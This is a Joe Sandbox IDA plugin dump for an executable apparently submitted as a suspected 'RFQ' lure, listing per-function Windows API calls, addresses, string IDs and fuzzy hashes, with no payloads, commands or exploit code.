                                                        • __freefls@4.LIBCMT ref: 00415209
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                        • String ID:
                                                        • API String ID: 442100245-0
                                                        • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                        • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                        • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                        • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                        APIs
                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                        • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                        • _wcslen.LIBCMT ref: 0045F94A
                                                        • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 621800784-4108050209
                                                        • Opcode ID: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                                                        • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                        • Opcode Fuzzy Hash: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                                                        • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • SetErrorMode.KERNEL32 ref: 004781CE
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                        • SetErrorMode.KERNEL32(?), ref: 00478270
                                                        • SetErrorMode.KERNEL32(?), ref: 00478340
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                        • String ID: \VH
                                                        • API String ID: 3884216118-234962358
                                                        • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                        • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                        • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                        • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                        • IsMenu.USER32(?), ref: 0044854D
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                        • DrawMenuBar.USER32 ref: 004485AF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert
                                                        • String ID: 0
                                                        • API String ID: 3076010158-4108050209
                                                        • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                        • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                        • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                        • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                        • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_memmove_wcslen
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1589278365-1403004172
                                                        • Opcode ID: b390ce327bdb117d99ebdbed723ce08061ac9d87120c1993f46cac3bc89cb6ac
                                                        • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                        • Opcode Fuzzy Hash: b390ce327bdb117d99ebdbed723ce08061ac9d87120c1993f46cac3bc89cb6ac
                                                        • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Handle
                                                        • String ID: nul
                                                        • API String ID: 2519475695-2873401336
                                                        • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                        • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                        • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                        • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Handle
                                                        • String ID: nul
                                                        • API String ID: 2519475695-2873401336
                                                        • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                        • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                        • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                        • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: SysAnimate32
                                                        • API String ID: 0-1011021900
                                                        • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                        • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                        • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                        • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                        APIs
                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                          • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                          • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                          • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                          • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                        • GetFocus.USER32 ref: 0046157B
                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                          • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                        • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                        • __swprintf.LIBCMT ref: 00461608
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                        • String ID: %s%d
                                                        • API String ID: 2645982514-1110647743
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                        Similarity
                                                        • API ID: Process$CloseCountersCurrentHandleOpen
                                                        • String ID:
                                                        • API String ID: 3488606520-0
                                                        APIs
                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                        Similarity
                                                        • API ID: ConnectRegistry_memmove_wcslen
                                                        • String ID:
                                                        • API String ID: 15295421-0
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                        • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                        • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                        Similarity
                                                        • API ID: AddressProc$Library$FreeLoad
                                                        • String ID:
                                                        • API String ID: 2449869053-0
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 004563A6
                                                        • ScreenToClient.USER32(?,?), ref: 004563C3
                                                        • GetAsyncKeyState.USER32(?), ref: 00456400
                                                        • GetAsyncKeyState.USER32(?), ref: 00456410
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorLongScreenWindow
                                                        • String ID:
                                                        • API String ID: 3539004672-0
                                                        APIs
                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                        • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                        Similarity
                                                        • API ID: Interlocked$DecrementIncrement$Sleep
                                                        • String ID:
                                                        • API String ID: 327565842-0
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                        • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                        • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String
                                                        • String ID:
                                                        • API String ID: 2832842796-0
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                        • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                        Similarity
                                                        • API ID: Enum$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 2095303065-0
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00436A24
                                                        Similarity
                                                        • API ID: RectWindow
                                                        • String ID:
                                                        • API String ID: 861336768-0
                                                        APIs
                                                        • SendMessageW.USER32 ref: 00449598
                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                        • _wcslen.LIBCMT ref: 0044960D
                                                        • _wcslen.LIBCMT ref: 0044961A
                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                        Similarity
                                                        • API ID: MessageSend$_wcslen$_wcspbrk
                                                        • String ID:
                                                        • API String ID: 1856069659-0
                                                        • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                        • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                        • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                        • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 004478E2
                                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                        • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                        • GetCursorPos.USER32(00000000), ref: 0044796A
                                                        • TrackPopupMenuEx.USER32(03016510,00000000,00000000,?,?,00000000), ref: 00447991
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CursorMenuPopupTrack$Proc
                                                        • String ID:
                                                        • API String ID: 1300944170-0
                                                        • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                        • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                        • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                        • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 004479CC
                                                        • GetCursorPos.USER32(?), ref: 004479D7
                                                        • ScreenToClient.USER32(?,?), ref: 004479F3
                                                        • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Client$CursorFromPointProcRectScreenWindow
                                                        • String ID:
                                                        • API String ID: 1822080540-0
                                                        • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                        • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                        • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                        • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                        • String ID:
                                                        • API String ID: 659298297-0
                                                        • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                        • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                        • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                        • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                        APIs
                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                          • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                          • Part of subcall function 00440D98: SendMessageW.USER32(03011A38,000000F1,00000000,00000000), ref: 00440E6E
                                                          • Part of subcall function 00440D98: SendMessageW.USER32(03011A38,000000F1,00000001,00000000), ref: 00440E9A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
